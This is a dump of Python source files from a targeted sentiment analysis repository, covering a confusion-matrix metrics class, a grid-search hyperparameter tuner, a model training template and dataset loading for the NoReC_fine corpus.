            if data is None else self.flatten(axis_label=axis_label, axis_pred=axis_pred, map=self.idx2label)

    def _init_labels(self, num_classes, ignore_index):
        # Build the default label list, dropping ignored entries.
        # BUG FIX: the original `labels.pop(idx)` removed by *position* while
        # iterating, so indices shifted after the first removal and the wrong
        # labels were dropped.
        ignored = set(ignore_index) if isinstance(ignore_index, list) else set()
        return [label for label in range(num_classes) if label not in ignored]

    # --- Per-class counts and rates derived from the matrix -----------------

    @property
    def tp(self):
        # True positives per class.
        return true_positive(self.matrix)

    @property
    def tn(self):
        # True negatives per class.
        return true_negative(self.matrix)

    @property
    def fp(self):
        # False positives per class.
        return false_positive(self.matrix)

    @property
    def fn(self):
        # False negatives per class.
        return false_negative(self.matrix)

    @property
    def tpr(self):
        # True positive rate (recall / sensitivity) per class.
        return true_positive_rate(self.matrix)

    @property
    def tnr(self):
        # True negative rate (specificity) per class.
        return true_negative_rate(self.matrix)

    @property
    def ppv(self):
        # Positive predictive value (precision) per class.
        return positive_predictive_value(self.matrix)

    @property
    def npv(self):
        # Negative predictive value per class.
        return negative_predictive_value(self.matrix)

    @property
    def fpr(self):
        # False positive rate per class.
        return false_positive_rate(self.matrix)

    @property
    def fnr(self):
        # False negative rate per class.
        return false_negative_rate(self.matrix)

    @property
    def fdr(self):
        # False discovery rate per class.
        return false_discovery_rate(self.matrix)

    @property
    def acc(self):
        # Diagonal (correct) counts as a share of all recorded predictions.
        return np.diag(self.matrix) / self.matrix.sum()

    # --- sklearn-backed aggregate scores ------------------------------------
    # BUG FIX for the four methods below: `zero_division` was accepted but
    # never forwarded to sklearn, so the parameter had no effect.

    def precision_score(self, average='macro', zero_division=0, **kwargs):
        return precision_score(self.gold_labels, self.predictions, average=average,
                               zero_division=zero_division, **kwargs)

    def recall_score(self, average='macro', zero_division=0, **kwargs):
        return recall_score(self.gold_labels, self.predictions, average=average,
                            zero_division=zero_division, **kwargs)

    def f1_score(self, average='macro', zero_division=0, **kwargs):
        return f1_score(self.gold_labels, self.predictions, average=average,
                        zero_division=zero_division, **kwargs)

    def accuracy_score(self, **kwargs):
        return accuracy_score(self.gold_labels, self.predictions, **kwargs)

    def update(self, gold_labels, predictions):
        r"""Update the confusion matrix from a list of predictions, with their respective gold labels.

        Args:
            gold_labels (list): gold labels (or truth labels).
            predictions (list): respective predictions.
        """
        # Make sure the inputs are 1D arrays
        gold_labels = np.array(gold_labels).reshape(-1)
        predictions = np.array(predictions).reshape(-1)
        self.gold_labels.extend(gold_labels)
        self.predictions.extend(predictions)
        # Complete the confusion matrix, skipping values not registered as
        # labels (unknown predictions, pad index, etc.).
        for i in range(len(predictions)):
            if gold_labels[i] in self.labels and predictions[i] in self.labels:
                actual = self.label2idx[gold_labels[i]]
                pred = self.label2idx[predictions[i]]
                self.matrix[actual, pred] += 1

    def to_dataframe(self, names=None, normalize=False):
        r"""Convert the ``ConfusionMatrix`` to a `DataFrame`.

        Args:
            names (list): list containing the ordered names of the indices used as gold labels.
            normalize (bool): if ``True``, normalize the ``matrix``.

        Returns:
            pandas.DataFrame
        """
        names = names or self.names
        matrix = self.normalize() if normalize else self.matrix
        return pd.DataFrame(matrix, index=names, columns=names)

    def to_dict(self):
        r"""Convert the ``ConfusionMatrix`` to a `dict`.

        Keys: ``score`` (accuracy), ``precision``, ``recall``, ``f1_score``
        (all macro-averaged floats) and ``confusion`` (the matrix as nested
        lists).

        Returns:
            dict
        """
        return {'score': float(self.accuracy_score()),
                'precision': float(self.precision_score()),
                'recall': float(self.recall_score()),
                'f1_score': float(self.f1_score()),
                'confusion': self.matrix.tolist()}

    def normalize(self):
        r"""Normalize the confusion ``matrix`` row-wise.

        .. math::
            \text{Norm}(Confusion) = \frac{Confusion}{sum(Confusion)}

        .. note::
            The operation is not inplace, and thus does not modify the attribute ```matrix```.

        Returns:
            numpy.ndarray: normalized confusion matrix.
        """
        # BUG FIX: cast to float so the `out` array of np.divide is always
        # float-typed; with an integer `data` matrix the original raised a
        # casting error.  Rows with no observations stay at zero (no NaN).
        top = self.matrix.astype(float)
        bottom = self.matrix.sum(axis=1)[:, np.newaxis].astype(float)
        return np.divide(top, bottom, out=np.zeros_like(top), where=bottom != 0)

    def zeros(self):
        r"""Zeros the ```matrix```. Can be used to empty memory without removing the object.

        Returns:
            None. Inplace operation.
        """
        self.matrix = np.zeros_like(self.matrix)

    def flatten(self, *args, **kwargs):
        r"""Flatten a confusion matrix to retrieve its prediction and gold labels.
        """
        return flatten_matrix(self.matrix, *args, **kwargs)

    def plot(self, names=None, normalize=False, cmap='Blues', cbar=True, **kwargs):
        r"""Plot the ``matrix`` in a new figure.

        .. warning::
            `plot` is compatible with matplotlib 3.1.1.
            If you are using an older version, the display may change (version < 3.0).

        Args:
            names (list): list of ordered names corresponding to the indices used as gold labels.
            normalize (bool): if ``True`` normalize the ``matrix``.
            cmap (string or matplotlib.pyplot.cmap): heat map colors.
            cbar (bool): if ``True``, display the colorbar associated to the heat map plot.

        Returns:
            matplotlib.Axes: axes corresponding to the plot.
        """
        # Convert the matrix in dataframe to be compatible with Seaborn
        df = self.to_dataframe(names=names, normalize=normalize)
        # Plot a heat map
        ax = sns.heatmap(df, annot=True, cmap=cmap, cbar=cbar, **kwargs)
        # Correct some bugs in the latest matplotlib version (3.1.1)
        bottom, top = ax.get_ylim()
        ax.set_ylim(bottom + 0.5, top - 0.5)
        # Display correctly the labels
        ax.set_yticklabels(rotation=0, labels=names)
        ax.set_ylabel("Actual")
        ax.set_xticklabels(rotation=90, labels=names)
        ax.set_xlabel("Predicted")
        return ax
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,708 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/process.py | r"""
Pre-process the data.
"""
import torchtext
from sentarget.datasets import NoReCfine
class Process:
    r"""Container for the train / eval / test splits of the NoReC_fine dataset,
    together with the torchtext fields used to build them.
    """

    def __init__(self, train_data, eval_data, test_data, fields=None):
        self.train_data, self.eval_data, self.test_data = train_data, eval_data, test_data
        self.fields = fields

    @classmethod
    def load(cls, fields=None):
        r"""Load the NoReC_fine splits.

        Args:
            fields (list, optional): ``(name, Field)`` pairs; defaults to a
                lower-cased text field plus a label field.

        Returns:
            Process: container holding the three splits and the fields.
        """
        text = torchtext.data.Field(lower=True, include_lengths=True, batch_first=True)
        label = torchtext.data.Field(batch_first=True)
        fields = fields if fields is not None else [("text", text), ("label", label)]
        train_data, eval_data, test_data = NoReCfine.splits(fields)
        # BUG FIX: use `cls` instead of the hard-coded class name so that
        # subclasses get an instance of their own type.
        return cls(train_data, eval_data, test_data, fields=fields)
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,709 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/utils/__init__.py | from .decorator import deprecated
from .display import *
from .functions import *
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,710 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/tuner/tuner.py | r"""
Hyperparameters optimization using a grid search algorithm.
Basically, you need to provide a set of parameters that will be modified.
The grid search will run on all permutations from the set of parameters provided.
Usually, you modify the hyperparameters and models' modules (ex, dropout etc.).
In addition, if you are using custom losses or optimizer that needs additional arguments / parameters,
you can provide them through the specific dictionaries (see the documentation of ``Tuner``).
Examples:
.. code-block:: python
# Hyper parameters to tune
params_hyper = {
'epochs': [150],
'lr': np.arange(0.001, 0.3, 0.01).tolist(), # Make sure to convert it to a list (for saving after)
}
# Parameters affecting the models
params_model = {
'model': [BiLSTM]
'hidden_dim': [100, 150, 200, 250], # Model attribute
'n_layers': [1, 2, 3], # Model attribute
'bidirectional': [False, True], # Model attribute
'LSTM.dropout': [0.2, 0.3, 0.4, 0.6], # Modify all LSTM dropout
# ...
}
params_loss = {
'criterion': [CrossEntropyLoss]
}
params_optim = {
'criterion': [Adam]
}
tuner = Tuner(params_hyper, params_loss=params_loss, params_optim=params_optim)
# Grid Search
tuner.fit(train_iterator, eval_iterator, verbose=True)
"""
import copy
import json
import os
from pathlib import Path
import torch
from sentarget.nn.models import BiLSTM
from .functional import tune, tune_optimizer, init_cls
from sentarget.utils import describe_dict, serialize_dict, permutation_dict
class Tuner:
r"""
The ``Tuner`` class is used for hyper parameters tuning.
From a set of models and parameters to tune, this class will look at the best model's performance.
.. note::
To facilitate the search and hyperameters tuning, it is recommended to use the
``sentarget.nn.models.Model`` abstract class as parent class for all of your models.
* :attr:`hyper_params` (dict): dictionary of hyperparameters to tune.
* :attr:`params_model` (dict): dictionary of model's parameters to tune.
* :attr:`params_loss` (dict): dictionary of loss's parameters to tune.
* :attr:`params_optim` (dict): dictionary of optimizer's parameters to tune.
* :attr:`options` (dict): dictionary of general options.
* :attr:`performance` (dict): dictionary of all models' performances.
"""
def __init__(self, params_hyper=None, params_model=None, params_loss=None, params_optim=None,
options=None):
# Hyper parameters with default values
self.params_hyper = params_hyper if params_model is not None else {}
self.params_model = params_model if params_model is not None else {}
self.params_loss = params_loss if params_loss is not None else {}
self.params_optim = params_optim if params_optim is not None else {}
# General options
self.options = {**self._init_options(), **options} if options is not None else self._init_options()
# Keep track of all performances
self.results = []
self._log = None
self._log_conf = None
self._log_perf = None
self.best_model = None
def _init_options(self):
options = {
'saves': True,
'dirsaves': '.saves',
'compare_on': 'accuracy',
'verbose': True,
}
return options
def _init_hyper(self):
params_hyper = {
'batch_size': 64,
'epochs': 100
}
return params_hyper
def reset(self):
r"""Reset all parameters to their default values."""
self.results = []
self._log = None
self._log_conf = None
self._log_perf = None
self.best_model = None
def fit(self, train_data, eval_data, **kwargs):
r"""Run the hyper parameters tuning.
Args:
train_data (iterator): training dataset.
eval_data (iterator): dev dataset.
Examples::
>>> from sentarget.tuner import Tuner
>>> from sentarget.nn.models.lstm import BiLSTM
>>> from sentarget.nn.models.gru import BiGRU
>>> # Hyper parameters to tune
>>> tuner = Tuner(
... params_hyper={
... 'epochs': [2, 3],
... 'lr': [0.01],
... 'vectors': 'model.txt'
... }
... params_model={
... 'model': [BiLSTM],
... }
... params_loss={
... 'criterion': [torch.nn.CrossEntropyLoss],
... 'ignore_index': 0
... }
... params_optim={
... 'optimizer': [torch.optim.Adam]
... }
... )
>>> # train_iterator = torchtext data iterato
>>> tuner.fit(train_iterator, valid_iterator)
"""
# Update the options dictionary
self.options = {**self.options, **kwargs}
dirsaves = self.options['dirsaves']
saves = self.options['saves']
compare_on = self.options['compare_on']
verbose = self.options['verbose']
# All combinations of parameters, for the grid search
configs_hyper = permutation_dict(self.params_hyper)
configs_model = permutation_dict(self.params_model)
configs_loss = permutation_dict(self.params_loss)
configs_optim = permutation_dict(self.params_optim)
self._log = self.log_init(len(configs_hyper), len(configs_model), len(configs_loss), len(configs_optim))
if verbose:
print(self._log)
num_search = 0
for config_hyper in configs_hyper:
for config_model in configs_model:
for config_loss in configs_loss:
for config_optim in configs_optim:
num_search += 1
# Set a batch size to the data
train_data.batch_size = config_hyper['batch_size']
eval_data.batch_size = config_hyper['batch_size']
# Initialize the model from arguments that are in config_model, and tune it if necessary
model = init_cls(config_model['model'], config_model)
tune(model, config_model)
modelname = model.__class__.__name__
# Load the criterion and optimizer, with their parameters
criterion = init_cls(config_loss['criterion'], config_loss)
optimizer = init_cls(config_optim['optimizer'], {'params': model.parameters(), **config_optim})
tune_optimizer(optimizer, config_hyper)
# Update the configuration log
self._log_conf = f"Search n°{num_search}: {modelname}\n"
self._log_conf += self.log_conf(config_hyper=config_hyper,
config_model=config_model,
config_loss=config_loss,
config_optim=config_optim)
self._log_conf += f"\n{model.__repr__()}"
self._log += f"\n\n{self._log_conf}"
if verbose:
print(f"\n{self._log_conf}")
# Train the model
best_model = model.fit(train_data, eval_data,
criterion=criterion,
optimizer=optimizer,
epochs=config_hyper['epochs'],
verbose=False,
compare_on=compare_on)
results = {
'performance': model.performance,
'hyper': config_hyper,
'model': config_model,
'optimizer': self.params_optim,
'criterion': self.params_loss
}
self.results.append(serialize_dict(results))
# Update the current best model
if (self.best_model is None or
best_model.performance['eval'][compare_on] > self.best_model.performance['eval'][compare_on]):
self.best_model = copy.deepcopy(best_model)
# Update the current performance log
self._log_perf = model.log_perf()
self._log += "\n" + self._log_perf
if verbose:
print(self._log_perf)
# Save the current checkpoint
if saves:
dirname = os.path.join(dirsaves, 'gridsearch', f"search_{num_search}")
filename = f"model_{modelname}.pt"
model.save(filename=os.path.join(dirname, filename), checkpoint=False)
filename = f"best_{modelname}.pt"
best_model.save(filename=os.path.join(dirname, filename), checkpoint=True)
# Save the associated log
self._save_current_results(os.path.join(dirname, 'results.json'))
self._save_current_log(os.path.join(dirname, 'log.txt'))
if saves:
self.save(dirsaves=dirsaves)
def log_init(self, hyper, model, loss, optim):
"""Generate a general configuration log.
Args:
hyper (int): number of hyper parameters permutations.
model (int): number of model parameters permutations.
loss (int): number of loss parameters permutations.
optim (int): number of optimizer parameters permutations.
Returns:
string: general log.
"""
log = "GridSearch(\n"
log += f" (options): Parameters({describe_dict(self.options, )})\n"
log += f" (session): Permutations(hyper={hyper}, model={model}, loss={loss}, optim={optim}, total={hyper * model * loss * optim})\n"
log += ")"
return log
def log_conf(self, config_hyper={}, config_model={}, config_loss={}, config_optim={}, **kwargs):
"""Generate a configuration log from the generated set of configurations files.
Args:
config_hyper (dict): hyper parameters configuration file.
config_model (dict): model parameters configuration file.
config_loss (dict): loss parameters configuration file.
config_optim (dict): optimizer parameters configuration file.
Returns:
string: configuration file representation.
"""
log = f"Configuration(\n"
log += f" (hyper): Variables({describe_dict(config_hyper, **kwargs)})\n"
log += f" (model): Parameters({describe_dict(config_model, **kwargs)})\n"
log += f" (criterion): {config_loss['criterion'].__name__}({describe_dict(config_loss, **kwargs)})\n"
log += f" (optimizer): {config_optim['optimizer'].__name__}({describe_dict(config_optim, **kwargs)})\n"
log += ')'
return log
def _save_current_results(self, filename='results.json'):
# Create the directory if it does not exists
dirname = os.path.dirname(filename)
Path(dirname).mkdir(parents=True, exist_ok=True)
with open(filename, 'w') as outfile:
json.dump(serialize_dict(self.results[-1]), outfile)
def _save_current_log(self, filename='log.txt'):
# Create the directory if it does not exists
dirname = os.path.dirname(filename)
Path(dirname).mkdir(parents=True, exist_ok=True)
with open(filename, 'w') as outfile:
outfile.write(self._log_conf + "\n" + self._log_perf)
def save_log(self, filename='log.txt'):
# Create the directory if it does not exists
dirname = os.path.dirname(filename)
Path(dirname).mkdir(parents=True, exist_ok=True)
with open(filename, 'w') as outfile:
outfile.write(self._log)
def save_results(self, filename='results.json'):
# Create the directory if it does not exists
dirname = os.path.dirname(filename)
Path(dirname).mkdir(parents=True, exist_ok=True)
data = {'results': self.results}
with open(filename, 'w') as outfile:
json.dump(data, outfile)
def save(self, dirsaves=None, checkpoint=True):
r"""Save the performances as a json file, by default.
Args:
dirsaves (string): name of saving directory.
checkpoint (bool): if ``True``, saves the best model's checkpoint.
"""
dirsaves = self.options['dirsaves'] if dirsaves is None else dirsaves
self.save_log(os.path.join(dirsaves, 'log_gridsearch.txt'))
self.save_results(os.path.join(dirsaves, 'results_gridsearch.json'))
# Saving the best model
filename = f"best_{self.best_model.__class__.__name__}.pt"
self.best_model.save(filename=os.path.join(dirsaves, filename), checkpoint=checkpoint)
# And its log / performances
self._save_current_results(os.path.join(dirsaves, 'best_results.json'))
self._save_current_log(os.path.join(dirsaves, 'best_log.txt'))
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,711 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/nn/models/model.py | r"""
Defines a model template.
A `Model` is really similar to the `Module` class, except that a `Model` has more inner methods,
used to train, evaluate and test a neural network.
The *API* is similar to sklearn or tensorflow.
.. code-block:: python
class Net(Model):
def __init__(self, *args):
super(Model, self).__init__()
# initialize your module as usual
def forward(*args):
# one forward step
pass
def run(train_iterator, criterion, optimizer):
# train one single time the network
pass
def evaluate(eval_iterator, criterion):
# evaluate one single time the network
pass
def predict(test_iterator):
# predict one single time the network
pass
# Run and train the model
model = Net()
model.fit(epochs, train_iterator, eval_iterator, criterion, optimizer)
"""
from abc import abstractmethod, ABC
import torch
import torch.nn as nn
import torch.optim as optim
# Data science
import os
from pathlib import Path
import time
import copy
from sentarget.utils import append2dict, describe_dict, stats_dict
class Model(nn.Module, ABC):
    r"""
    A `Model` is used to define a neural network.
    This template is easier to handle for hyperparameters optimization, as the ``fit``, ``run``, ``evaluate``
    methods are part of the model.

    * :attr:`checkpoint` (dict): checkpoint of the best model tested (state dicts, names and scores).
    * :attr:`performance` (dict): dictionary where performances are stored.

        * ``'train'`` (dict): training metrics, one list entry per epoch.
        * ``'eval'`` (dict): evaluation metrics, one list entry per epoch.
    """

    def __init__(self):
        super().__init__()
        # Performances are initialized through reset() so subclasses share one scheme.
        self.checkpoint = None
        self.performance = None
        self.reset()

    @abstractmethod
    def forward(self, *inputs, **kwargs):
        raise NotImplementedError

    def reset(self):
        """Reset the performance and associated checkpoint dictionary."""
        self.checkpoint = {
            'epoch': None,
            'model_name': None,
            'model_state_dict': None,
            'optimizer_name': None,
            'criterion_name': None,
            'optimizer_state_dict': None,
            'train': None,
            'eval': None
        }
        self.performance = {
            "train": {},
            "eval": {}
        }

    @abstractmethod
    def run(self, iterator, criterion, optimizer, *args, **kwargs):
        r"""Train one time the model on iterator data.

        Args:
            iterator (Iterator): iterator containing batch samples of data.
            criterion (Loss): loss function to measure scores.
            optimizer (Optimizer): optimizer used during training to update weights.

        Returns:
            dict: the performance and metrics of the training session.
        """
        raise NotImplementedError

    @abstractmethod
    def evaluate(self, iterator, criterion, *args, **kwargs):
        r"""Evaluate one time the model on iterator data.

        Args:
            iterator (Iterator): iterator containing batch samples of data.
            criterion (Loss): loss function to measure scores.

        Returns:
            dict: the performance and metrics of the evaluation session.
        """
        raise NotImplementedError

    def predict(self, iterator, *args, **kwargs):
        r"""Predict the model on iterator data.

        Args:
            iterator (Iterator): iterator containing batch samples of data.

        Returns:
            dict: the performance and metrics of the prediction session.
        """
        raise NotImplementedError

    def _update_checkpoint(self, epoch, criterion, optimizer, results_train=None, results_eval=None):
        r"""Update the model's checkpoint. Keep track of its epoch, model state,
        optimizer state, and performances.

        Args:
            epoch (int): epoch at the current training state.
            criterion (Loss): loss function to measure scores.
            optimizer (Optimizer): optimizer used during training to update weights.
            results_train (dict, optional): metrics for the training session at epoch. The default is ``None``.
            results_eval (dict, optional): metrics for the evaluation session at epoch. The default is ``None``.
        """
        self.checkpoint = {
            'epoch': epoch,
            'model_name': self.__class__.__name__,
            'model_state_dict': copy.deepcopy(self.state_dict()),
            'optimizer_name': optimizer.__class__.__name__,
            'criterion_name': criterion.__class__.__name__,
            # BUG FIX: `reset()` declares this key but the original never filled
            # it in, which made saved checkpoints unusable to resume training.
            'optimizer_state_dict': copy.deepcopy(optimizer.state_dict()),
            'train': results_train,
            'eval': results_eval
        }

    def fit(self, train_iterator, eval_iterator,
            criterion=None, optimizer=None, epochs=10, verbose=True, compare_on='accuracy', **kwargs):
        r"""Train and evaluate a model X times. During the training, both training
        and evaluation results are saved under the `performance` attribute.

        Args:
            train_iterator (Iterator): iterator containing batch samples of data.
            eval_iterator (Iterator): iterator containing batch samples of data.
            epochs (int): number of times the model will be trained.
            criterion (Loss): loss function to measure scores. Defaults to ``CrossEntropyLoss``.
            optimizer (Optimizer): optimizer used during training. Defaults to ``Adam``.
            verbose (bool, optional): if ``True`` display a progress bar and metrics at each epoch.
            compare_on (string): name of the score on which models are compared.
                NOTE: a higher score is assumed to be better; if no epoch beats 0,
                the return value is ``None``.

        Returns:
            Model: the best model evaluated (a deep copy of ``self`` at its best epoch).

        Examples::
            >>> model = MyModel()
            >>> criterion = nn.CrossEntropyLoss()
            >>> optimizer = optim.Adam(model.parameters())
            >>> model.fit(train_iterator, eval_iterator, epochs=10, criterion=criterion, optimizer=optimizer)
        """
        self.reset()
        # Keep track of the best model.
        best_model = None
        best_eval_score = 0
        start_time = time.time()
        # Default update rules.
        criterion = nn.CrossEntropyLoss() if criterion is None else criterion
        optimizer = optim.Adam(self.parameters()) if optimizer is None else optimizer
        # Train and evaluate the model epochs times.
        for epoch in range(epochs):
            if verbose:
                print(f"Epoch:\t{epoch + 1:3d}/{epochs}")
            # Train and evaluate the model.
            results_train = self.run(train_iterator, criterion, optimizer, **{**kwargs, 'verbose': verbose})
            results_eval = self.evaluate(eval_iterator, criterion, **{**kwargs, 'verbose': verbose})
            # Update the eval dictionary by adding the results at the current epoch.
            append2dict(self.performance["train"], results_train)
            append2dict(self.performance["eval"], results_eval)
            if verbose:
                print("\t Stats Train: | " + describe_dict(results_train, pad=True, capitalize=True, sep_val=': ', sep_key=' | '))
                print("\t Stats Eval:  | " + describe_dict(results_eval, pad=True, capitalize=True, sep_val=': ', sep_key=' | '))
                print()
            # We copy in memory the best model.
            if best_eval_score < self.performance["eval"][compare_on][-1]:
                best_eval_score = self.performance["eval"][compare_on][-1]
                self._update_checkpoint(epoch + 1, criterion, optimizer, results_train=results_train, results_eval=results_eval)
                best_model = copy.deepcopy(self)
        self.performance['time'] = time.time() - start_time
        return best_model

    def describe_performance(self, *args, **kwargs):
        """Get a display of the last performance for both train and eval.

        Returns:
            tuple: two strings showing statistics for train and eval sessions.
        """
        dict_train = {key: performance[-1] for (key, performance) in self.performance['train'].items()}
        dict_eval = {key: performance[-1] for (key, performance) in self.performance['eval'].items()}
        return describe_dict(dict_train, *args, **kwargs), describe_dict(dict_eval, *args, **kwargs)

    def state_json(self):
        r"""Return a serialized ``state_dict``, so it can be saved as a ``json``.

        Returns:
            dict: parameter name -> nested lists of values.
        """
        state = {key: value.tolist() for (key, value) in self.state_dict().items()}
        return state

    def log_perf(self, **kwargs):
        """Get a log from the performances."""
        describe_train, describe_eval = self.describe_performance(pad=True, **kwargs)
        stats_train = stats_dict(self.performance['train'])
        stats_eval = stats_dict(self.performance['eval'])
        log = f"Performances(\n"
        log += f"  (train): Scores({describe_train})\n"
        log += f"  (eval):  Scores({describe_eval})\n"
        for (key_train, stat_train), (key_eval, stat_eval) in zip(stats_train.items(), stats_eval.items()):
            log += f"  (train): {str(key_train).capitalize()}({describe_dict(stat_train, pad=True, **kwargs)})\n"
            log += f"  (eval)   {str(key_eval).capitalize()}({describe_dict(stat_eval, pad=True, **kwargs)})\n"
        log += ')'
        return log

    def save(self, filename='model.pt', checkpoint=True):
        r"""Save the best torch model.

        Args:
            filename (string, optional): name of the file.
            checkpoint (bool, optional): True to save the model at the best checkpoint during training.
        """
        # Create the directory if it does not exist.
        dirname = os.path.dirname(filename)
        Path(dirname).mkdir(parents=True, exist_ok=True)
        torch.save(self, filename)
        # Save its checkpoint alongside, tagged with the best epoch.
        if checkpoint:
            epoch = self.checkpoint['epoch']
            basename = os.path.basename(filename)
            name = basename.split('.')[0]
            checkname = f"checkpoint_{name}_epoch{epoch}.pt"
            torch.save(self.checkpoint, os.path.join(dirname, checkname))
50,712 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/datasets/norecfine.py | """
The ``NoReCfine`` class defines the latest datasets used for targeted sentiment analysis.
.. code-block:: python
# First, download the training / dev / test data
train_data, dev_data, test_data = NoReCfine.splits(train_data="path_to_train",
dev_data="path_to_eval",
test_data="path_to_test")
"""
